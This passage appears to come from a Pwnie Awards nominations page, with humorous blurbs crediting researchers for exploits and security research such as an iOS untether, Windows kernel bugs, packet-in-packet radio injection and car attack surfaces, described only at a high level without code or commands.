recognize both excellence and incompetence in the field of information security
Credit: pod2g
This exploit was used for the Absinthe iOS 5.0/5.0.1 untether. It massaged the kernel heap into submission, copying over the syscall table and giving pod2g (as well as jailbreak users everywhere) a happy ending. And who doesn’t love happy endings?
Credit: Mateusz “j00ru” Jurczyk
j00ru owned Windows. All of them. Ok, well just all of the 32-bit versions of Windows from NT through the Windows 8 Developer Preview. What have you done lately? And to top it off, he wrote a clear paper on it with some of the nicest boxy diagrams we have ever seen in a LaTeX paper.
Credit: Derek Soeder
I’ll admit it. The unspecified Pwnie Award judge writing this description never understands any of Derek’s bugs and it’s getting late and he wants to go to sleep. But Derek’s bugs always look big pimpin’ and he wishes that he did understand them.
Travis Goodspeed
Yo dawg, Travis heard you like packets, so he put packets in packets so that he could inject packets into your internal network from all the way across the Internet. Doesn’t sound very neighborly to us, but it’s still way cool.
Packets in Packets: Orson Welles’ In-Band Signaling Attacks for Modern Radios
Tarjei Mandt
What did the Windows kernel ever do to Tarjei to deserve the merciless beating he has subjected it to over the last several years? Has he not subjected it to enough pain? Apparently not yet.
Igor Glucksmann
Incomplete Code Signing attacks are not only useful for iOS jailbreaks, they can also be used to add a few more features to signed PE executables (i.e. software installers, updates, etc) without invalidating the Authenticode signatures. But why would anyone want to do that?
Rolf Rolles
What you say is more important than how you say it. It turns out that this is true in machine code as well. Rolf’s keynote presentation at REcon described how to take approaches from academic program analysis and apply them to real-world reverse engineering challenges.
Stephen Checkoway, et. al.
Many hackers have been complaining about the extinction of unmitigated vanilla stack buffer overflows. It turns out that they are not extinct at all, they have all just migrated to YOUR CAR. Stephen Checkoway and the rest of his team identified and exploited these vulnerabilities through a burned CD, paired BlueTooth device, unpaired BlueTooth device, and through a phone call to the car’s internal GSM cell phone. Yes, they can call up your car and install malware on it, which they actually implemented (how non-Academic of them). The future is a very scary place. Luckily, the majority of the Pwnie Award judges don’t drive. Or use computers. Or phones.
Comprehensive Experimental Analyses of Automotive Attack Surface
Marco Figueroa
Giving shoutouts to almost all of the Pwnie Award judges definitely helps win a Pwnie nomination (for the record, offerings of 0day work better). Only time will tell if this song is a “certified Pwnie Award winner”.
NYAN
Who would have thought that C++ method names from MSHTML.DLL could make such a catchy chorus? We never would have.